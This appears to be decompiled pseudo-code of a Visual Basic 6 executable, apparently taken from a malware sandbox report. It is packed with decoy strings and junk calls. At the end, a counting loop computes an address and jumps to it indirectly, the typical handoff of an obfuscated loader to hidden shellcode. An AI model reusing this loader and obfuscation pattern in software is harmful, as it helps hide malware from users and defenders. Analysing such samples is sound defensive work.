				intOrPtr _v104;
				intOrPtr _v108;
				long long _v116;
				void* _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				short _v136;
				void* _v140;
				signed int _v144;
				void* _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				intOrPtr _v168;
				signed int _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr _v196;
				char _v204;
				signed int _v212;
				char _v220;
				char _v236;
				signed int _v256;
				signed int _v260;
				char _v268;
				signed int _v276;
				char _v284;
				char* _v292;
				char _v300;
				intOrPtr _v308;
				intOrPtr _v316;
				intOrPtr _v324;
				intOrPtr _v332;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				char _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				signed int _v448;
				signed long long _v452;
				signed int _v456;
				intOrPtr* _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr* _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				void* _t799;
				signed int _t800;
				signed int _t804;
				signed int _t808;
				signed int _t828;
				signed int _t831;
				signed int _t834;
				signed int _t841;
				signed int _t847;
				signed int _t851;
				signed int _t855;
				signed int _t864;
				signed int _t865;
				signed int _t874;
				signed int _t878;
				signed int _t895;
				signed int _t900;
				signed int _t909;
				signed int _t913;
				signed int _t914;
				signed int _t918;
				signed int _t928;
				signed int* _t931;
				signed int _t937;
				signed int _t942;
				signed int _t944;
				signed int _t955;
				char* _t957;
				char* _t959;
				signed int _t962;
				signed int _t967;
				signed int _t973;
				signed int _t980;
				char* _t985;
				char* _t987;
				char* _t991;
				signed int _t999;
				signed int _t1004;
				signed int _t1013;
				signed int _t1018;
				signed int _t1026;
				signed int _t1034;
				signed int* _t1038;
				signed int _t1049;
				signed int _t1053;
				signed int _t1057;
				signed int* _t1061;
				signed int _t1064;
				signed int _t1075;
				signed int _t1081;
				char* _t1085;
				signed int* _t1086;
				signed int _t1089;
				signed int* _t1097;
				signed int* _t1098;
				char* _t1118;
				char* _t1192;
				void* _t1223;
				void* _t1225;
				intOrPtr _t1226;
				intOrPtr* _t1227;
				void* _t1228;
				void* _t1229;
				void* _t1230;
				void* _t1231;
				intOrPtr _t1239;
				signed int _t1286;
				long long _t1287;

				_t1226 = _t1225 - 0x18;
				 *[fs:0x0] = _t1226;
				L00401480();
				_v28 = _t1226;
				_v24 = 0x4011c0;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				_t799 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401486, _t1223);
				_v8 = 1;
				_v8 = 2;
				_push(0);
				_push(1);
				_push(2);
				L004016AE();
				if(_t799 != 0x102) {
					_v8 = 3;
					_v8 = 4;
					if( *0x41331c != 0) {
						_v440 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v440 = 0x41331c;
					}
					_v376 =  *_v440;
					_t1085 =  &_v204;
					L0040169C();
					_t1226 = _t1226 + 0x10;
					L004016A2();
					_t1086 =  &_v184;
					L004016A8();
					_t1089 =  *((intOrPtr*)( *_v376 + 0xc))(_v376, _t1086, _t1086, _t1085, _t1085, _t1085, _v156, L"UULjaijLMUuw190", 0);
					asm("fclex");
					_v380 = _t1089;
					if(_v380 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x40da18);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v444 = _t1089;
					}
					L004016C0();
					L00401696();
				}
				_v8 = 6;
				_v260 = L"Firsaarsfdselsdage";
				_v268 = 8;
				L0040167E();
				_t800 =  &_v204;
				_push(_t800);
				L00401684();
				L0040168A();
				_push(_t800);
				_push(L"String");
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t800));
				L004016C6();
				L00401696();
				_t804 = _v376;
				if(_t804 != 0) {
					_v8 = 7;
					_v8 = 8;
					_push(0x61);
					L00401678();
					_v144 = _t804;
				}
				_v8 = 0xa;
				_push(0x40dad4);
				L0040166C();
				_push(_t804);
				L00401672();
				L0040168A();
				_push(_t804);
				_push(0x40dae0);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t804));
				L004016C6();
				_t808 = _v376;
				_t1239 = _t808;
				if(_t1239 != 0) {
					_v8 = 0xb;
					_v8 = 0xc;
					_push(0x5e);
					L00401666();
					_v168 = _t808;
				}
				_v8 = 0xe;
				_v356 = 0x4cfd;
				_v364 = 0x894cfd;
				_v360 =  *0x4013b8;
				_v352 = 0x1717;
				_t1097 =  &_v172;
				L00401660();
				_v372 =  *0x4013b0;
				_t1286 =  *0x4013a8;
				_v100 = _t1286;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v372, 0x38543700, 0x5b04,  &_v172,  &_v352,  &_v360, 0xd506b040, 0x5af6,  &_v364, 0x7fcc33,  &_v356, _t1097, _t1097);
				_t1098 =  &_v172;
				L004016C6();
				_v8 = 0xf;
				_v212 = 0x80020004;
				_v220 = 0xa;
				_v196 = 0x80020004;
				_v204 = 0xa;
				_push( &_v220);
				_push( &_v204);
				asm("fld1");
				_push(_t1098);
				_push(_t1098);
				_v164 = _t1286;
				asm("fld1");
				_push(_t1098);
				_push(_t1098);
				_v172 = _t1286;
				asm("fld1");
				_push(_t1098);
				_push(_t1098);
				_v180 = _t1286;
				asm("fld1");
				_push(_t1098);
				_push(_t1098);
				_v188 = _t1286;
				L00401654();
				L0040165A();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t1239 == 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_v448 = 1;
				}
				_v376 =  ~_v448;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1227 = _t1226 + 0xc;
				if(_v376 != 0) {
					_v8 = 0x10;
					_v452 =  *0x401398 *  *0x401390;
					 *_t1227 = _v452;
					_t1081 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t1098);
					asm("fclex");
					_v376 = _t1081;
					if(_v376 >= 0) {
						_v456 = _v456 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x40d650);
						_push(_a4);
						_push(_v376);
						L004016D8();
						_v456 = _t1081;
					}
				}
				_v8 = 0x12;
				_v196 = 0x20;
				_v204 = 2;
				_push( &_v204);
				_push(1);
				_push( &_v220);
				L00401642();
				_v276 = 0x40db04;
				_v284 = 0x8008;
				_push( &_v220);
				_t828 =  &_v284;
				_push(_t828);
				L00401648();
				_v376 = _t828;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1228 = _t1227 + 0xc;
				_t831 = _v376;
				if(_t831 != 0) {
					_v8 = 0x13;
					_v8 = 0x14;
					_push(0xffea4050);
					_push(L"moderskabernes");
					_push(L"KLARLG");
					_push(0);
					L0040163C();
					_v164 = _t831;
				}
				_v8 = 0x16;
				_push(0x40dad4);
				L0040166C();
				_push(_t831);
				_push( &_v204);
				L00401636();
				_v260 = 0x40dae0;
				_v268 = 0x8008;
				_push( &_v204);
				_t834 =  &_v268;
				_push(_t834);
				L00401648();
				_v376 = _t834;
				L00401696();
				if(_v376 != 0) {
					_v8 = 0x17;
					_v8 = 0x18;
					if( *0x41331c != 0) {
						_v460 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v460 = 0x41331c;
					}
					_v376 =  *_v460;
					_v324 = 0x2f5590;
					_v332 = 3;
					_v308 = 0x5a05e8;
					_v316 = 3;
					_v292 = 0x18;
					_v300 = 2;
					_v276 = 0x4fac9d;
					_v284 = 3;
					_v260 = L"Totalization";
					_v268 = 8;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1075 =  *((intOrPtr*)( *_v376 + 0x44))(_v376, 0x10, 0x10, 0x10, 0x10, 0x10,  &_v184);
					asm("fclex");
					_v380 = _t1075;
					if(_v380 >= 0) {
						_v464 = _v464 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40da18);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v464 = _t1075;
					}
					_v412 = _v184;
					_v184 = _v184 & 0x00000000;
					_v196 = _v412;
					_v204 = 9;
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v104);
					L00401630();
					L00401696();
				}
				_v8 = 0x1a;
				_t1287 =  *0x401388;
				_v360 = _t1287;
				L00401660();
				_v352 = 0x261c;
				_t841 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v352,  &_v172, 0x102a, 0x175e,  &_v360, 0x130a71);
				_v376 = _t841;
				if(_v376 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40d680);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v468 = _t841;
				}
				L004016C6();
				_v8 = 0x1b;
				_v260 = L"10/10/10";
				_v268 = 8;
				L0040167E();
				_push( &_v204);
				_push( &_v220);
				L00401624();
				_push( &_v220);
				L0040162A();
				_v116 = _t1287;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1229 = _t1228 + 0xc;
				_v8 = 0x1c;
				_v196 = 0x4b;
				_v204 = 2;
				_t847 =  &_v204;
				_push(_t847);
				L0040161E();
				L0040168A();
				_push(_t847);
				_push(0x40db94);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t847));
				L004016C6();
				L00401696();
				_t851 = _v376;
				if(_t851 != 0) {
					_v8 = 0x1d;
					_v8 = 0x1e;
					_push(0x14);
					L00401618();
					_v128 = _t851;
				}
				_v8 = 0x20;
				_v260 = L"2:2:2";
				_v268 = 8;
				L0040167E();
				_push( &_v204);
				_push( &_v220);
				L00401612();
				_v276 = 2;
				_v284 = 0x8002;
				_push( &_v220);
				_t855 =  &_v284;
				_push(_t855);
				L00401648();
				_v376 = _t855;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1230 = _t1229 + 0xc;
				if(_v376 != 0) {
					_v8 = 0x21;
					_t1057 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v184);
					asm("fclex");
					_v376 = _t1057;
					if(_v376 >= 0) {
						_v472 = _v472 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40d650);
						_push(_a4);
						_push(_v376);
						L004016D8();
						_v472 = _t1057;
					}
					if( *0x41331c != 0) {
						_v476 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v476 = 0x41331c;
					}
					_v380 =  *_v476;
					_v416 = _v184;
					_v184 = _v184 & 0x00000000;
					_t1061 =  &_v188;
					L004016BA();
					_t1064 =  *((intOrPtr*)( *_v380 + 0x40))(_v380, _t1061, _t1061, _v416, L"Moaria");
					asm("fclex");
					_v384 = _t1064;
					if(_v384 >= 0) {
						_v480 = _v480 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40da18);
						_push(_v380);
						_push(_v384);
						L004016D8();
						_v480 = _t1064;
					}
					L004016C0();
				}
				_v8 = 0x23;
				_v364 = 0x2444d0;
				_v360 = 0x3c014f;
				L00401660();
				_t864 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, L"Lezannes",  &_v172, 0x836eee,  &_v360, 0x2e66,  &_v364, 0x1750a7);
				_v376 = _t864;
				if(_v376 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40d680);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v484 = _t864;
				}
				L004016C6();
				_v8 = 0x24;
				_v196 = 9;
				_v204 = 2;
				_t865 =  &_v204;
				_push(_t865);
				L0040160C();
				L0040168A();
				_push(_t865);
				_push(0x40dbfc);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t865));
				L004016C6();
				L00401696();
				if(_v376 != 0) {
					_v8 = 0x25;
					if( *0x41331c != 0) {
						_v488 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v488 = 0x41331c;
					}
					_v376 =  *_v488;
					_t1049 =  *((intOrPtr*)( *_v376 + 0x1c))(_v376,  &_v184);
					asm("fclex");
					_v380 = _t1049;
					if(_v380 >= 0) {
						_v492 = _v492 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v492 = _t1049;
					}
					_v384 = _v184;
					_t1053 =  *((intOrPtr*)( *_v384 + 0x50))(_v384);
					asm("fclex");
					_v388 = _t1053;
					if(_v388 >= 0) {
						_v496 = _v496 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40da78);
						_push(_v384);
						_push(_v388);
						L004016D8();
						_v496 = _t1053;
					}
					L004016C0();
				}
				_v8 = 0x27;
				_v212 = 1;
				_v220 = 2;
				_v260 = 0x40dc08;
				_v268 = 8;
				L0040167E();
				_push( &_v220);
				_push(2);
				_push( &_v204);
				_push( &_v236);
				L00401606();
				_v292 = 0x40dc14;
				_v300 = 0x8008;
				_push( &_v236);
				_t874 =  &_v300;
				_push(_t874);
				L00401648();
				_v376 = _t874;
				_push( &_v236);
				_push( &_v220);
				_push( &_v204);
				_push(3);
				L0040164E();
				_t1231 = _t1230 + 0x10;
				_t878 = _v376;
				if(_t878 != 0) {
					_v8 = 0x28;
					_v8 = 0x29;
					_v260 = _a4;
					_v268 = 9;
					_v292 = L"Underskriftsindsamling";
					_v300 = 8;
					_v324 = 0x559ada;
					_v332 = 3;
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t878 = 0x10;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"R8RKPuezMDYUe6qnGrDitDuDZFS86");
					_push(_v100);
					L00401600();
					_t1231 = _t1231 + 0x3c;
				}
				_v8 = 0x2b;
				_push(0x40dcac);
				L004015FA();
				if(_t878 != 1) {
					_v8 = 0x2c;
					_push(L"Hemathidrosis8");
					_push(0x90);
					_push(0xffffffff);
					_push(0x20);
					L004015F4();
				}
				_v8 = 0x2e;
				_v352 = 0x2f52;
				L00401660();
				L00401660();
				_v360 = 0x1a6005;
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v360, 0x1997,  &_v172, 0x75f6990, 0x5af9,  &_v176, L"delbetnkning",  &_v352,  &_v364);
				_v152 = _v364;
				_push( &_v176);
				_push( &_v172);
				_push(2);
				L004015EE();
				_v8 = 0x2f;
				if( *0x41331c != 0) {
					_v500 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40da28);
					L004016DE();
					_v500 = 0x41331c;
				}
				_v376 =  *_v500;
				_t895 =  *((intOrPtr*)( *_v376 + 0x14))(_v376,  &_v184);
				asm("fclex");
				_v380 = _t895;
				if(_v380 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40da18);
					_push(_v376);
					_push(_v380);
					L004016D8();
					_v504 = _t895;
				}
				_v384 = _v184;
				_t900 =  *((intOrPtr*)( *_v384 + 0x58))(_v384,  &_v172);
				asm("fclex");
				_v388 = _t900;
				if(_v388 >= 0) {
					_v508 = _v508 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x40da38);
					_push(_v384);
					_push(_v388);
					L004016D8();
					_v508 = _t900;
				}
				_v420 = _v172;
				_v172 = _v172 & 0x00000000;
				L0040168A();
				L004016C0();
				_v8 = 0x30;
				L004015E8();
				_v8 = 0x31;
				L004015DC();
				L004015E2();
				L0040168A();
				_t1118 =  &_v204;
				L00401696();
				_v8 = 0x32;
				_v356 = 0x2f1f;
				_v352 = 0x4e6e;
				_v448 =  *0x401380;
				_v456 =  *0x401378;
				_t909 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x6ff6,  &_v352, _t1118,  &_v356, _t1118, _t1118, L"Circuted",  &_v372,  &_v204,  &_v204);
				_v376 = _t909;
				if(_v376 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40d680);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v512 = _t909;
				}
				_v68 = _v372;
				_v64 = _v368;
				_v8 = 0x33;
				_v260 = 0x40dd3c;
				_v268 = 8;
				_v276 = 1;
				_v284 = 0x8002;
				_push( &_v268);
				_t913 =  &_v284;
				_push(_t913);
				L00401648();
				_t914 = _t913;
				if(_t914 != 0) {
					_v8 = 0x34;
					_t1034 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v184);
					asm("fclex");
					_v376 = _t1034;
					if(_v376 >= 0) {
						_v516 = _v516 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40d650);
						_push(_a4);
						_push(_v376);
						L004016D8();
						_v516 = _t1034;
					}
					if( *0x41331c != 0) {
						_v520 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v520 = 0x41331c;
					}
					_v380 =  *_v520;
					_v424 = _v184;
					_v184 = _v184 & 0x00000000;
					_t1038 =  &_v188;
					L004016BA();
					_t914 =  *((intOrPtr*)( *_v380 + 0x40))(_v380, _t1038, _t1038, _v424, L"Skamsttter8");
					asm("fclex");
					_v384 = _t914;
					if(_v384 >= 0) {
						_v524 = _v524 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40da18);
						_push(_v380);
						_push(_v384);
						L004016D8();
						_v524 = _t914;
					}
					L004016C0();
				}
				_v8 = 0x36;
				_push(0x40dd60);
				_push(0x40dd60);
				L00401690();
				if(_t914 != 0) {
					_v8 = 0x37;
					_v8 = 0x38;
					_push(0);
					_push(L"isogamous");
					_push( &_v204);
					L004015D6();
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v44);
					L00401630();
					L00401696();
				}
				_v8 = 0x3a;
				_v260 = L"21:21:21";
				_v268 = 8;
				L0040167E();
				_push( &_v204);
				_push( &_v220);
				L004015D0();
				_v276 = 0x15;
				_v284 = 0x8002;
				_push( &_v220);
				_t918 =  &_v284;
				_push(_t918);
				L00401648();
				_v376 = _t918;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				if(_v376 != 0) {
					_v8 = 0x3b;
					_v8 = 0x3c;
					if( *0x41331c != 0) {
						_v528 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v528 = 0x41331c;
					}
					_v376 =  *_v528;
					_v260 = 0x2e;
					_v268 = 2;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1026 =  *((intOrPtr*)( *_v376 + 0x34))(_v376, 0x10, 0x590,  &_v184);
					asm("fclex");
					_v380 = _t1026;
					if(_v380 >= 0) {
						_v532 = _v532 & 0x00000000;
					} else {
						_push(0x34);
						_push(0x40da18);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v532 = _t1026;
					}
					_v428 = _v184;
					_v184 = _v184 & 0x00000000;
					_push(_v428);
					_push( &_v160);
					L004016BA();
				}
				_v8 = 0x3e;
				L00401660();
				L00401660();
				_v360 = 0x833ac7;
				L00401660();
				_t928 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x811, 0x5c6238,  &_v172, L"Turns5",  &_v360,  &_v176,  &_v180, 0x259dc8);
				_v376 = _t928;
				if(_v376 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40d680);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v536 = _t928;
				}
				_push( &_v180);
				_push( &_v176);
				_t931 =  &_v172;
				_push(_t931);
				_push(3);
				L004015EE();
				_v8 = 0x3f;
				_push(0x40dae0);
				L004015CA();
				if(_t931 != 0x61) {
					_v8 = 0x40;
					_v8 = 0x41;
					if( *0x41331c != 0) {
						_v540 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v540 = 0x41331c;
					}
					_v376 =  *_v540;
					_t1013 =  *((intOrPtr*)( *_v376 + 0x1c))(_v376,  &_v184);
					asm("fclex");
					_v380 = _t1013;
					if(_v380 >= 0) {
						_v544 = _v544 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v544 = _t1013;
					}
					_v384 = _v184;
					_t1018 =  *((intOrPtr*)( *_v384 + 0x64))(_v384, 1,  &_v352);
					asm("fclex");
					_v388 = _t1018;
					if(_v388 >= 0) {
						_v548 = _v548 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40da78);
						_push(_v384);
						_push(_v388);
						L004016D8();
						_v548 = _t1018;
					}
					_v136 = _v352;
					L004016C0();
				}
				_v8 = 0x43;
				if( *0x41331c != 0) {
					_v552 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40da28);
					L004016DE();
					_v552 = 0x41331c;
				}
				_v376 =  *_v552;
				_t937 =  *((intOrPtr*)( *_v376 + 0x14))(_v376,  &_v184);
				asm("fclex");
				_v380 = _t937;
				if(_v380 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40da18);
					_push(_v376);
					_push(_v380);
					L004016D8();
					_v556 = _t937;
				}
				_v384 = _v184;
				_t942 =  *((intOrPtr*)( *_v384 + 0x130))(_v384,  &_v172);
				asm("fclex");
				_v388 = _t942;
				if(_v388 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40da38);
					_push(_v384);
					_push(_v388);
					L004016D8();
					_v560 = _t942;
				}
				_v432 = _v172;
				_v172 = _v172 & 0x00000000;
				L0040168A();
				L004016C0();
				_v8 = 0x44;
				_v196 = 0x20;
				_v204 = 2;
				_t944 =  &_v204;
				_push(_t944);
				_push(1);
				L004015C4();
				L0040168A();
				_push(_t944);
				_push(0x40db04);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t944));
				L004016C6();
				L00401696();
				if(_v376 != 0) {
					_v8 = 0x45;
					_v8 = 0x46;
					_push(0);
					_push(L"Outpushed1");
					_push( &_v204);
					L004015D6();
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v40);
					L00401630();
					L00401696();
				}
				_v8 = 0x48;
				_v356 = 0x4cf0;
				_v352 = 0x442;
				_v372 =  *0x401370;
				L00401660();
				_t955 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v172,  &_v372, 0x108, 0x122123, 0xfffcfd10, 0x5af4,  &_v352, 0x465b67,  &_v356, 0x2bf0);
				_v376 = _t955;
				if(_v376 >= 0) {
					_v564 = _v564 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40d680);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v564 = _t955;
				}
				L004016C6();
				_v8 = 0x49;
				_v260 =  &_v124;
				_v268 = 0x6003;
				_t957 =  &_v268;
				_push(_t957);
				L004015BE();
				if(_t957 == 0xffff) {
					_v8 = 0x4c;
					_v260 =  &_v96;
					_v268 = 0x6003;
					_t959 =  &_v268;
					_push(_t959);
					L004015BE();
					if(_t959 == 0xffff) {
						_v8 = 0x4f;
						_push(L"Flavic7");
						_push(L"Frdigbyggende");
						_push( &_v204); // executed
						L004015B8(); // executed
						_v260 = _v260 & 0x00000000;
						_v268 = 0x8008;
						_push( &_v204);
						_t962 =  &_v268;
						_push(_t962);
						L00401648();
						_v376 = _t962;
						L00401696();
						if(_v376 != 0) {
							_v8 = 0x50;
							_v8 = 0x51;
							if( *0x41331c != 0) {
								_v568 = 0x41331c;
							} else {
								_push(0x41331c);
								_push(0x40da28);
								L004016DE();
								_v568 = 0x41331c;
							}
							_v376 =  *_v568;
							_t999 =  *((intOrPtr*)( *_v376 + 0x4c))(_v376,  &_v184);
							asm("fclex");
							_v380 = _t999;
							if(_v380 >= 0) {
								_v572 = _v572 & 0x00000000;
							} else {
								_push(0x4c);
								_push(0x40da18);
								_push(_v376);
								_push(_v380);
								L004016D8();
								_v572 = _t999;
							}
							_v384 = _v184;
							_t1004 =  *((intOrPtr*)( *_v384 + 0x24))(_v384, L"tricuspid", L"vehefte",  &_v172);
							asm("fclex");
							_v388 = _t1004;
							if(_v388 >= 0) {
								_v576 = _v576 & 0x00000000;
							} else {
								_push(0x24);
								_push(0x40de70);
								_push(_v384);
								_push(_v388);
								L004016D8();
								_v576 = _t1004;
							}
							_v436 = _v172;
							_v172 = _v172 & 0x00000000;
							L0040168A();
							L004016C0();
						}
						_v8 = 0x53;
						L004015B2();
						_v8 = 0x54;
						_t967 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v352, 0xffffffff);
						asm("fclex");
						_v376 = _t967;
						if(_v376 >= 0) {
							_v580 = _v580 & 0x00000000;
						} else {
							_push(0x1b8);
							_push(0x40d650);
							_push(_a4);
							_push(_v376);
							L004016D8();
							_v580 = _t967;
						}
						_t973 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
						asm("fclex");
						_v380 = _t973;
						if(_v380 >= 0) {
							_v584 = _v584 & 0x00000000;
						} else {
							_push(0x1bc);
							_push(0x40d650);
							_push(_a4);
							_push(_v380);
							L004016D8();
							_v584 = _t973;
						}
						_v8 = 0x55;
						_v260 = _v260 & 0x00000000;
						_v256 = _v256 & 0x00000000;
						_v268 = 6;
						L004015AC();
						while(1) {
							_v8 = 0x57;
							_v260 = 1;
							_v268 = 2;
							L004015A6();
							L004015AC();
							_v8 = 0x58;
							 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v204,  &_v268,  &_v88);
							_v8 = 0x59;
							_v196 = 0x20;
							_v204 = 2;
							_t980 =  &_v204;
							_push(_t980);
							_push(1);
							L004015C4();
							L0040168A();
							_push(_t980);
							_push(0x40db04);
							L00401690();
							asm("sbb eax, eax");
							_v376 =  ~( ~( ~_t980));
							L004016C6();
							L00401696();
							if(_v376 != 0) {
								_v8 = 0x5a;
								_v8 = 0x5b;
								_push(0);
								_push(L"dwell");
								_push( &_v204);
								L004015D6();
								_push(0x10);
								L00401480();
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_push(0);
								_push(_v108);
								L00401630();
								L00401696();
							}
							_v8 = 0x5d;
							_v196 = 1;
							_v204 = 2;
							_push(0);
							_t985 =  &_v204;
							_push(_t985);
							L004015A0();
							L0040168A();
							L00401696();
							_v8 = 0x5e;
							_push(0);
							_push(0);
							_push(1);
							L0040159A();
							_t1192 = _t985;
							L0040168A();
							_v8 = 0x5f;
							_v260 = 0x2ffff;
							_v268 = 0x8003;
							_push( &_v88);
							_t987 =  &_v268;
							_push(_t987);
							L00401594();
							if(_t987 == 0) {
								break;
							}
						}
						_v8 = 0x62;
						_v260 = 0xff8ae9ae;
						do {
							_t1192 = _t1192 + 1;
						} while (_t1192 != 0xffcbf0ec);
						_a20 = _t1192 + 0x74a08d;
						_a20();
						_push(cs);
						asm("invalid");
					} else {
					}
				} else {
				}
				_v20 = 0;
				asm("wait");
				_push(0x410862);
				L004016C0();
				L004016C0();
				L00401696();
				L004016C6();
				L00401696();
				L004016C6();
				_push( &_v96);
				_push(0);
				L0040158E();
				L004016C0();
				L004016C0();
				L004016C0();
				L004016C6();
				_t991 =  &_v124;
				_push(_t991);
				_push(0);
				L0040158E();
				L004016C6();
				L004016C6();
				L004016C6();
				L004016C0();
				L004016C0();
				return _t991;
			}

0x0040ea9c
0x0040eaab
0x0040eab7
0x0040eabf
0x0040eac2
0x0040eacf
0x0040ead8
0x0040eadb
0x0040eaea
0x0040eaed
0x0040eaf4
0x0040eafb
0x0040eafd
0x0040eaff
0x0040eb01
0x0040eb0b
0x0040eb11
0x0040eb18
0x0040eb26
0x0040eb43
0x0040eb28
0x0040eb28
0x0040eb2d
0x0040eb32
0x0040eb37
0x0040eb37
0x0040eb55
0x0040eb68
0x0040eb6f
0x0040eb74
0x0040eb78
0x0040eb7e
0x0040eb85
0x0040eb99
0x0040eb9c
0x0040eb9e
0x0040ebab
0x0040ebcd
0x0040ebad
0x0040ebad
0x0040ebaf
0x0040ebb4
0x0040ebba
0x0040ebc0
0x0040ebc5
0x0040ebc5
0x0040ebda
0x0040ebe5
0x0040ebe5
0x0040ebea
0x0040ebf1
0x0040ebfb
0x0040ec11
0x0040ec16
0x0040ec1c
0x0040ec1d
0x0040ec2a
0x0040ec2f
0x0040ec30
0x0040ec35
0x0040ec3c
0x0040ec42
0x0040ec4f
0x0040ec5a
